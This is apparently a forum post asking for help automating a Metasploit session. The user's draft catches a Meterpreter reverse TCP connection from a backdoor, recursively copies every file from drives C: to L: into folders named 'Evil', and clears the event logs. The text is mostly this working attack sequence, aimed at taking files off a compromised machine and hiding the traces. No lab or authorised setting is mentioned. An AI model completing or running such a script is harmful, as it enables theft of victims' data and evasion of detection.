So i would like to create a script that auto launches the msfconsole connects to the backdoor and downloads every file from the machine. Thats how far i got:
msfconsole
use windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 443
exploit
run file_collector -r -d d:\\ -l /root/Downloaded/EvilD/
run file_collector -r -d c:\\ -l /root/Downloaded/EvilC/
run file_collector -r -d e:\\ -l /root/Downloaded/EvilE/
run file_collector -r -d f:\\ -l /root/Downloaded/EvilF/
run file_collector -r -d g:\\ -l /root/Downloaded/EvilG/
run file_collector -r -d h:\\ -l /root/Downloaded/EvilH/
run file_collector -r -d i:\\ -l /root/Downloaded/EvilI/
run file_collector -r -d j:\\ -l /root/Downloaded/EvilJ/
run file_collector -r -d k:\\ -l /root/Downloaded/EvilK/
run file_collector -r -d l:\\ -l /root/Downloaded/EvilL/
irb
log.clear
exit

Please help how is it possible.
Any help apriciated. Thanks.